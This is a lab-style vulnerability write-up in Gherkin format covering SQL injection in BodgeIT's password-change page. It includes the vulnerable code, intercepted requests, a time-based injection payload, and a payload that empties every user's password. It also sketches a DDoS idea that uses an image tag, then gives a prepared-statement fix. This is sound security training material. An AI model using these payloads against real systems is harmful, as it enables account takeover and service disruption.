## Version 1.4.1
## language: en

Feature:
  TOE:
    BodgeIT
  Category:
    Injection Flaws
  Location:
    bodgeit/password.jsp - password1, password2 (parameters)
  CWE:
    CWE-0089: Improper Neutralization of Special Elements used in an SQL Command
    ('SQL Injection') -base-
      https://cwe.mitre.org/data/definitions/89.html
    CWE-0943: Improper Neutralization of Special Elements in Data Query
    Logic -class-
      https://cwe.mitre.org/data/definitions/943.html
    CWE-1019: Validate Inputs
      https://cwe.mitre.org/data/definitions/1019.html
  CAPEC:
    CAPEC-066: SQL Injection -standard-
      http://capec.mitre.org/data/definitions/66.html
    CAPEC-248: Command Injection
      http://capec.mitre.org/data/definitions/248.html
  Rule:
    REQ.172: https://fluidattacks.com/web/es/rules/172/
  Goal:
    Inject a SQL query in an unintended field
  Recommendation:
    Use prepared statements for SQL queries

  Background:
  Hacker's software:
    | <Software name>       | <Version> |
    | Kali Linux            | 2017.3    |
    | Firefox Quantum       | 64.0b14   |
    | Burp Suite CE         | 1.7.36    |
  TOE information:
    Given I am running BodgeIT in a docker container at
    """
    http://localhost:8000/bodgeit/
    """

  Scenario: Normal use case
  Normal site navigation
    Given I go to http://localhost:8000/bodgeit/password.jsp
    Then I can change my password

  Scenario: Static detection
  No input validation for unusual XSS payloads
    When I look at the code at "/bodgeit/root/password.jsp"
    """
    ...
    10  String password1 = (String) request.getParameter("password1");
    11  String password2 = (String) request.getParameter("password2");
    12  String okresult = null;
    13  String failresult = null;
    14
    15  if (password1 != null && password1.length() > 0) {
    16    if ( ! password1.equals(password2)) {
    17      failresult = "The passwords you have supplied are different.";
    18    }  else if (password1 == null || password1.length() < 5) {
    19      failresult = "You must supply a password of at least 5 characters.";
    20    } else {
    21      Statement stmt = conn.createStatement();
    22      ResultSet rs = null;
    23      try {
    24        stmt.executeQuery("UPDATE Users set password= '" + password1 + "'
    25        where name = '" + username + "'");
    26
    27        okresult = "Your password has been changed";
    ...
    """
    Then I see it's building the SQL query with raw user input

  Scenario: Dynamic detection
  SQL injection
    Given I am logged in to the site
    And intercept a password change request with Burp and send it to repeater
    """
    POST /bodgeit/password.jsp HTTP/1.1
    Host: localhost:8000
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/
    65.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*
    ;q=0.8
    Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: http://localhost:8000/bodgeit/password.jsp
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 23
    Connection: close
    Cookie: b_id=""; JSESSIONID=F1B5FFCAFC944853AFD96F38CF86ACE0
    Upgrade-Insecure-Requests: 1

    password1=12345&password2=12345
    """
    Then I try inserting a quote in the password to see if it causes any errors
    """
    POST /bodgeit/password.jsp HTTP/1.1
    ...
    password1=12345'&password2=12345'
    """
    And it does, even if not too useful
    """
    System error.
    """
    Then because it's a password change, I figure the SQL query must be update
    Then I try a time based injection after the password
    """
    password1=' WHERE REPEAT('a',30000000)=REPEAT('b',30000000) OR REPEAT('c',30
    000000)=REPEAT('d',30000000);--&password2=' WHERE REPEAT('a',30000000)=REPEA
    T('b',30000000) OR REPEAT('c',30000000)=REPEAT('d',30000000);--
    """
    Then when I send the request, it takes a few seconds to return
    Then I know the field is vulnerable to SQL injection
    And the query is probably something like
    """
    UPDATE userstable SET password='$password'restofthequery
    """

  Scenario: Exploitation
  Changing a victim's password
    Given I send a request with the data
    """
    password1=' WHERE ''='';--&password2=' WHERE ''='';--
    """
    Then I have left all user's passwords empty
    And I can take over any account I want

  Scenario: Remediation
  Using prepared statements
    Given I patch the code as follows
    """
    ...
    10  String password1 = (String) request.getParameter("password1");
    11  String password2 = (String) request.getParameter("password2");
    12  String okresult = null;
    13  String failresult = null;
    14
    15  if (password1 != null && password1.length() > 0) {
    16    if ( ! password1.equals(password2)) {
    17      failresult = "The passwords you have supplied are different.";
    18    }  else if (password1 == null || password1.length() < 5) {
    19      failresult = "You must supply a password of at least 5 characters.";
    20    } else {
    21      PreparedStatement stmt = conn.prepareStatement("UPDATE Users set pas
    sword= ?
    22        where name = ?");
    23      stmt.setString(1, password1);
    24      stmt.setString(2, username);
    25      ResultSet rs = null;
    26      try {
    27        stmt.executeQuery();
    28
    29        okresult = "Your password has been changed";
    ...
    """
    Then SQL injection is not posible anymore

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    8.1/10 (High) - AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/
  Temporal: Attributes that measure the exploit's popularity and fixability
    7.5/10 (High) - E:F/RL:O/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    7.5/10 (High) - CR:M/IR:M/AR:M

  Scenario: Correlations
    0650-chng-pwd-get-rquest
      Given I post a "<img>" with src url that injects a heavy query
      And post it to a public site with a lot of traffic
      Then I can DDOS the site without much effort

